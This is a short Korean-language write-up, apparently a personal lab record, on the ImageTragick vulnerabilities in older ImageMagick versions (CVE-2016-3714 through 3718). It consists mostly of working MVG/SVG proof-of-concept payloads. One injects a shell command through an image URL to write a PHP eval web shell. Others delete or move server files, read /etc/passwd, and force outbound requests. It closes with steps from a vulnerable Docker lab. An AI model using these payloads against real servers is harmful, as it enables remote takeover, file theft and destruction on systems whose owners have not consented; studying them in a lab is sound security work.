ImageMagick RCE

 

ImageMagick_RCE 기록

 

 

공격자가 공격코드가 포함된 이미지를 업로드 하고, 원격에서 해당 코드를 실행시켜 서버를 장악할 수 있는 원격코드 실행취약점
취약버전 : ImageMagick "6.9.3-10" "7.0.1-1"이하의 버전

 

 

이미지 매직?
이미지매직(ImageMagick)은 그래픽 이미지를 새로 만들거나, 고치는 데 사용되는 자유-오픈 소스 소프트웨어이다. 이미지 매직은 대부분의 이미지 형식을 읽고, 변환하거나 쓸 수 있다. 이미지의 외곽을 자르거나, 색을 바꾸는 것을 비롯한 다양한 효과를 줄 수 있으며, 이미지의 회전, 합치기, 문자삽입, 선, 다각형, 타원, 베지에 곡선을 그려넣거나, 이미지 늘이기 등의 작업을 할 수 있다.

 

 

취약점?
취약버전 : ImageMagick "6.9.3-10" "7.0.1-1"이하의 버전

[root@docker app]# convert -a

Version: ImageMagick 6.7.8-9 2014-06-10 Q16 http://www.imagemagick.org

Copyright: Copyright (C) 1999-2012 ImageMagick Studio LLC

 

 

1. ImageMagick_RCE

1) PoC CVE-2016-3714
확장자 " svg " " mvg "파일의 업로드하여 원격에서 서버에서 명령 쉘의 실행이 가능
--------------------------
viewbox 0 0 1 1
image over 0,0 0,0 'https://docker//" ||echo \'<?php eval($_POST[\'tra\']);?>\' > imageover.php && echo "0'

 

2) PoC CVE-2016-3715
"ephemeral : / '프로토콜을 이용하여 공격자는 원격 서버에서 파일을 삭제 가능.
--------------------------
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'ephemeral:/tmp/delete.txt'
popgraphic-context

 

3) PoC CVE-2016-3716
"msl : /"의사 프로토콜을 이용하여 공격자는 원격으로 파일을 이동 가능
--------------------------
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'msl:/tmp/msl.txt'
popgraphic-context

 

4) PoC CVE-2016-3717
" label : @ "프로토콜을 이용하여 파일 내용을 볼 수 있음.
--------------------------
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'label:@...c/passwd'
pop graphic-context

 

5) PoC CVE-2016-3718
서버 요청 위조. 공격자는 조작 된 파일을 이용하여 서버를 악성 도메인에 연결시킬 수 있음.
--------------------------
push graphic-context
viewbox 0 0 640 480
fill 'url(http://example.com/)'
pop graphic-context

 

 

 

1.
취약한 서버 구축 doker

.mvg 파일 조작

 

 

 

 

2.
취약점에 의한 폴더 생성
viewbox 0 0 1 1
image over 0,0 0,0 'https://docker//" || mkdir tra "0'

 

 

 

3.
상위 폴더 파일 삭제
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'ephemeral:./security.txt'
popgraphic-context

 

 

 

 

 

 

-ImageMagick RCE -